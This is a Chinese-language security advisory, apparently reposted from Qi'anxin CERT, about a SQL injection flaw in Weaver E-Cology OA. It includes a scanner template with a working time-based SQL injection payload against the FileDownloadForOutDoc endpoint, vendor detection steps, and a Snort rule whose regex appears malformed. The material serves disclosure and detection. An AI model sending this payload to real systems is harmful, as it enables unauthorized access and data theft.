漏洞概述 | |||
漏洞名称 | 泛微E-Cology SQL注入漏洞 | ||
漏洞编号 | QVD-2023-15672 | ||
公开时间 | 2023-07-07 | 影响对象数量级 | 万级 |
奇安信评级 | 高危 | CVSS 3.1分数 | 8.6 |
威胁类型 | 代码执行,信息泄露 | 利用可能性 | 高 |
POC状态 | 未公开 | 在野利用状态 | 未发现 |
EXP状态 | 未公开 | 技术细节状态 | 未公开 |
危害描述:远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限等。 |
Ecology 8.x 补丁版本 < 10.58.0
id: ecology-oa-filedownloadforoutdoc-sqli info: name: EcologyOA filedownloadforoutdoc - SQL injection author: unknown severity: critical description: EcologyOA filedownloadforoutdoc interface has SQL injection tags: ecology-oa,sqli requests: - raw: - | POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1 Host: {{Hostname}} Accept: */* Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close fileid=2+WAITFOR DELAY+'0:0:5'&isFromOutImg=1 matchers: - type: dsl dsl: - 'duration>=5'
奇安信网神网络数据传感器(NDS5000/7000/9000系列)产品,已具备该漏洞的检测能力。规则ID为:7806,建议用户尽快升级检测规则库至2307101630以上。
奇安信天眼检测方案
奇安信天眼新一代安全感知系统已经能够有效检测针对该漏洞的攻击,请将规则版本升级到3.0.0710.13960或以上版本。规则ID及规则名称:0x100216EC,泛微E-Cology SQL注入漏洞。奇安信天眼流量探针规则升级方法:系统配置->设备升级->规则升级,选择“网络升级”或“本地升级”。
奇安信网站应用安全云防护系统检测方案
奇安信网神网站应用安全云防护系统已全局更新所有云端防护节点的防护规则,支持对泛微 e-cology 前台SQL注入漏洞的防护。
Snort检测方案
Snort是一个开源的入侵检测系统,使用规则来检测网络流量中的恶意行为。用户可参考以下Snort检测规则,进行检测:
alert tcp any any -> any any (msg:"Weaver E-Cology SQLi"; content:"weaver.file.FileDownloadForOutDoc"; http_uri; content:"isFromOutImg=1"; content:"fileid="; pcre:"/bselectb/i"; classtype:web-application-attack; sid:1000002; rev:1;)
原文始发于微信公众号(奇安信 CERT):【已复现】泛微E-Cology SQL注入漏洞安全风险通告
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论